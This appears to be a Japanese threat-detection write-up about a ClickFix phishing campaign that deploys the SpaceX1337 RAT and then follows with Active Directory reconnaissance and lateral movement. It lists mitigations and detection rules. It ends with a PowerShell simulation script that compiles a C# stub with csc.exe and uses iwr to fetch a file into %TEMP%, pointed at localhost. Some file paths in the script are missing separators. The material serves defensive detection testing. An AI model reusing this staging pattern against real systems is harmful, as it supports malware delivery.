SpaceX1337のClickFixが手作業によるAD侵害に繋がる
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
攻撃者はClickFixフィッシングルアを利用してSpaceX1337 RATを展開し、その後NetSupport、AsyncRAT、Remusといった汎用RATを含む多段階感染を伴いました。侵入は自動化された資格情報の窃取からActive Directoryを狙ったインタラクティブなハンズオンキーボード活動へと進行しました。最終的に攻撃者はドメインコントローラへの横方向移動とVPNポータルに対する資格情報詰め込みを試みました。
調査
この侵入は完全に装備されたActive Directoryハニーネット内で捕捉され、EDR、Zeek、Suricataのテレメトリによるエンドツーエンドの可視化を提供しました。研究者は初期のPowerShellダウンローダーから、広範囲にわたるADSI/LDAPリコネサンスとSMBを介した横方向移動の活動を追跡しました。調査により、自動化されたマルウェア実行から人間のオペレーターによる直接的な操作への移行が明確に識別されました。
緩和策
組織は厳格なPowerShell実行制御を実施し、疑わしい親子プロセスの関係を監視すべきです。これには explorer.exe がPowerShellを生成する場合も含まれます。セキュリティチームはホスト上のコンパイルが csc.exe を通じて行われていないか、または certutil or や などのLOLBinsの悪用が、外部ダウンロードのために行われていないか検出する必要があります。Active DirectoryはLDAP属性からの機密データの削除や異常なLDAPクエリの監視によっても強化されるべきです。
対応
疑わしい活動が検出された場合、インシデント対応者は影響を受けたエンドポイントを隔離し、潜在的に危険なサービスアカウントやドメイン管理者の資格情報を無効にするべきです。調査は複数のRATファミリーの特定と不正なスケジュールタスクやレジストリの修正が行われていないかの確認に優先的に取り組むべきです。VPNログは悪意のあるインフラからの資格情報詰め込みの試みを検出するためにレビューされるべきです。
攻撃フロー
検出
疑わしいフォルダからのPython実行(via cmdline)
疑わしいRunMRUエントリ、LOLBinセマンティクス付き(via registry_event)
Windowsリモート管理を使用したリモートホスト上でのコマンド実行(via cmdline)
アカウントまたはグループ列挙/操作の可能性(via cmdline)
疑わしいドメイントラストの発見(via cmdline)
システムネットワーク構成発見の可能性(via cmdline)
名前に数字のみを含む疑わしい実行可能ファイル(via cmdline)
LOLBAS Schtasks(via cmdline)
データエンコーディングおよび証明書操作のためのCertutil使用(via cmdline)
LOLBAS Bitsadmin(via cmdline)
SAM/SYSTEM/SECURITYダンプの可能性(via cmdline)
Powershellからの疑わしい.NETメソッド呼び出し(via powershell)
疑わしいTrycloudflareドメイン通信(via dns)
IPルックアップドメイン通信試行の可能性(via dns)
検出すべきIOC(HashSha256): ClickFix SpaceX1337からのハンズオンキーボードAD攻撃
検出すべきIOC(HashMd5): ClickFix SpaceX1337からのハンズオンキーボードAD攻撃
検出すべきIOC(SourceIP): ClickFix SpaceX1337からのハンズオンキーボードAD攻撃
検出すべきIOC(DestinationIP): ClickFix SpaceX1337からのハンズオンキーボードAD攻撃
SpaceX1337とAdaptixC2通信のための高忠実度Sigmaルール[Windowsネットワーク接続]
AdaptixC2ビーコンのコンパイルとPowerShellローダーの検出[Windowsプロセス作成]
シミュレーション実行
前提条件: テレメトリとベースライン事前検査はパスしている必要があります。
理由: このセクションでは、検出ルールをトリガーするよう設計された攻撃者技術(仮の攻撃手法)の正確な実行を詳細に解説します。ここでのコマンドおよび説明は、特定された仮の攻撃手法を直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。抽象的または無関係な例は誤診につながります。
-
攻撃の流れとコマンド: 攻撃者はフィッシングリンクを介して初期アクセスを獲得しました。既知の悪意ある
.exeをディスクに持ち込むのを避けるため、彼らは小さな.csソースファイルをドロップします。次にcsc.exeを呼び出し、このソースを実用的なWindows実行可能ファイル(svc.exe)にコンパイルします。このファイルは%TEMP%ディレクトリに配置されます。コンパイル直後、攻撃者はiwr(Invoke-WebRequest) エイリアスを使用して、リモートC2サーバーからセカンドステージローダーを取得するためにPowerShellを使用し、テンポラリフォルダに保存してステージングプロセスを完了します。 -
回帰テストスクリプト:
# 1. AdaptixC2ソースをシミュレートするためにダミーのC#ソースファイルを作成 $csFile = "$env:TEMPsvc.cs" $exeFile = "$env:TEMPsvc.exe" $sourceCode = @" using System; namespace MimicC2 { class Program { static void Main() { Console.WriteLine("Simulated Beacon"); } } } "@ $sourceCode | Out-File -FilePath $csFile -Encoding ascii # 2. csc.exeのコンパイルをシミュレート(Triggers selection_csc) # 検出ロジックで指定された正確なフラグを使用しています Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait # 3. PowerShellダウンロードをシミュレート(Triggers selection_powershell) # 'iwr'および特定のOutFileパスを使用してロジックに一致させています # 実際のネットワークトラフィックを避けるために存在しないURLを使用していますが、コマンドラインは一致します powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`"" -
クリーンアップコマンド:
Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue